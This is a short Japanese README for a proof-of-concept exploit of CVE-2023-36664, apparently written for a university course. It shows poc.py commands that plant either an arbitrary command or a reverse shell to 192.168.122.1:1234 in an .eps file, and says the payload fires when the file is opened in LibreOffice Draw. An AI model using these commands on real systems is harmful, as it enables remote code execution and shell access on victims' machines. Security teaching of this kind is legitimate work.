
CVE-2023-36664 の概念実証。
.eps ファイルにペイロードを挿入するには:
python3 poc.py -f "filename" --payload "command"
#python3 poc.py -f file.eps --payload firefox
.eps ファイルにリバースシェルペイロードを挿入するには:
python3 poc.py -f "filename" --revshell --ip "ip" --port "port"
#python3 poc.py -f file.eps --revshell --ip 192.168.122.1 --port 1234
注入されたファイルを Libreoffice Draw で開くと、ペイロードがトリガーされるはずです。
この概念実証は、大学の特定のコースのために作成されました。教育的な目的でのみここに公開されています。